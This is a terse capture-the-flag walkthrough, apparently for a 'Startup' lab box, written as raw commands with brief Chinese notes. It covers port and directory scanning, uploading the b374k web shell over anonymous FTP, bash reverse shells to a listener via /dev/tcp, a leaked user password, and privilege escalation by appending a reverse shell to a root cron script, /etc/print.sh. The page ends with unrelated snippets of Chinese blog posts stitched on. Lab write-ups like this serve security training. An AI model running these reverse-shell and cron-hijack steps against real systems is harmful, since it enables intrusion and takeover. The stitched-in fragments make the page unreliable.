nmap -A 10.10.37.216
python3 dirsearch.py -u http://10.10.37.216/ -e all
http://10.10.37.216/files/
ftp 10.10.37.216
Anonymous
b374k.php
files
)
http://10.10.37.216/files/ftp/b374k.php
nc -vlk 7877
bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
love
incidents
suspicious.pcapng
/home
lennie
使用者c4ntg3t3n0ughsp1c3
su lennie
并搭配上述密码
planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
startup_list.txt
/etc/print.sh
/etc/print.sh
可以发现我们有 write 的权限
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
print.sh
下面加上一行 reverse shell
echo "bash -c 'bash -i >& /dev/tcp/10.14.7.198/8778 0>&1'" >> /etc/print.sh
nc -vlk 8778
来听planner.sh
crontab -l
今天的主题有两个 一、unity图片分割(Slice Sprite) 目标:把一张素材切成很多小素材...
Unit Test 应用於 Web APIs-前言 现今大多数的软件工程都是以网路工程为主,那网路工...
这篇主要讲GetX所提供, 自己有接触过的额外功能 为大家介绍 多国语系, 萤幕长宽, snackb...
Golang 学习资源 昨天几乎整晚没睡,小屁孩疑似玫瑰疹,每半小时就起来一次,目前肉体跟灵魂已经分...
「灯愣~」 (以下为系统登入事件的自动通知) 「您好,兔兔」 「欢迎登入 Vuta 奇幻世界」 咦...